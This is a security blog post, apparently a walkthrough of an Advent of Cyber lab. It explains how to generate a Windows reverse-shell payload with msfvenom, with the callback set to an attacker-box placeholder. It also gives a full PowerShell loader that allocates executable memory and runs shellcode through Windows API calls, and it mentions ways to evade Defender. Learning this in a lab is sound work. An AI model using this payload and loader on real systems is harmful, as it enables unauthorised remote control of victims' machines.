Security Notes By Cxnrvd
Day 8: ShellCode

Day 8: ShellCode

ConradWilliam's photo
ConradWilliam
·

3 min read

A Hacker’s Lesson: Writing Shellcode and Creating a Reverse Shell

Glitch, a skilled but mistrusted hacker, was prepping for a tech conference. He was eager to share his shellcode script that remotely accessed his home system. As he worked, he noticed Mayor Malware's henchmen lurking nearby.

"They're wasting their time. I don't have anything they'd want," Glitch chuckled.

He didn't realise that hidden in his home system was something they desperately sought—a research paper he wrote on Wareville's defences, a treasure Mayor Malware was eager to obtain.

Learning Objectives

Through this blog, you’ll:

  • Understand the basics of writing shellcode.

  • Learn to generate shellcode for reverse shells.

  • Execute shellcode using PowerShell.

What is Shellcode?

Shellcode is a snippet of code, typically written in assembly language, used by attackers to exploit vulnerabilities in systems. It allows them to inject commands and gain control over compromised machines. Though commonly associated with malicious activities, shellcode is a vital concept for ethical hacking and penetration testing.

Key Terminologies

PowerShell

PowerShell is a versatile scripting tool for Windows systems. While administrators use it for legitimate automation tasks, attackers exploit its deep system integration to execute malicious scripts stealthily.

Windows Defender and Bypass Techniques

Windows Defender scans code to block malware. To evade detection, attackers use:

  1. Obfuscation: Hiding malicious patterns.

  2. Reflective Injection: Running code directly in memory, bypassing signature-based defenses.

Windows API

The Windows Application Programming Interface (API) enables interaction with system-level functions like memory management and file operations. Exploits often leverage API functions such as VirtualAlloc, CreateThread, and WaitForSingleObject to execute shellcode effectively.

Reverse Shells

In a reverse shell, the target machine initiates a connection back to the attacker’s system. This technique is pivotal for remote exploitation, enabling attackers to control the compromised device.

Generating Shellcode

To generate a reverse shell, we use msfvenom, a powerful tool for creating payloads. Here's the command:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKBOX_IP LPORT=1111 -f powershell

  • -p: Specifies the payload type (reverse shell for Windows).

  • LHOST: The attacker's IP address.

  • LPORT: The port on the attacker’s machine to listen for connections.

  • -f: Specifies the output format (PowerShell script).

Sample Output

The command generates a PowerShell script containing the shellcode:

[Byte[]] $buf = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31...

Executing Shellcode

To run shellcode, it must be loaded into memory and executed. Below is a PowerShell script that uses Windows API functions for this process:

PowerShell Script

$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;

public class VrtAlloc{
    [DllImport("kernel32")]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);  
}
"@
Add-Type $VrtAlloc 

$WaitFor = @"
using System;
using System.Runtime.InteropServices;

public class WaitFor{
 [DllImport("kernel32.dll", SetLastError=true)]
    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);   
}
"@
Add-Type $WaitFor

$CrtThread = @"
using System;
using System.Runtime.InteropServices;

public class CrtThread{
 [DllImport("kernel32", CharSet=CharSet.Ansi)]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
"@
Add-Type $CrtThread   

[Byte[]] $buf = SHELLCODE_PLACEHOLDER
[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

Script Breakdown

  1. VirtualAlloc: Allocates memory for the shellcode.

  2. Marshal.Copy: Copies the shellcode into the allocated memory.

  3. CreateThread: Starts a thread to execute the shellcode.

  4. WaitForSingleObject: Waits for the shellcode execution to complete.

Conclusion

Working with shellcode is like walking a tightrope—it’s both fascinating and dangerous. Glitch’s experience shows just how easy it is for things to go sideways if you’re not careful. The tools we use, like msfvenom and PowerShell, are incredibly powerful, but they also need a good dose of respect.

This isn’t just about running commands and hoping for the best; it’s about understanding what’s happening under the hood—allocating memory, copying bytes, starting threads. Each step matters. And then there’s the bigger picture: keeping sensitive data safe and staying one step ahead of whoever’s trying to get their hands on it.

AdventOfCyber2024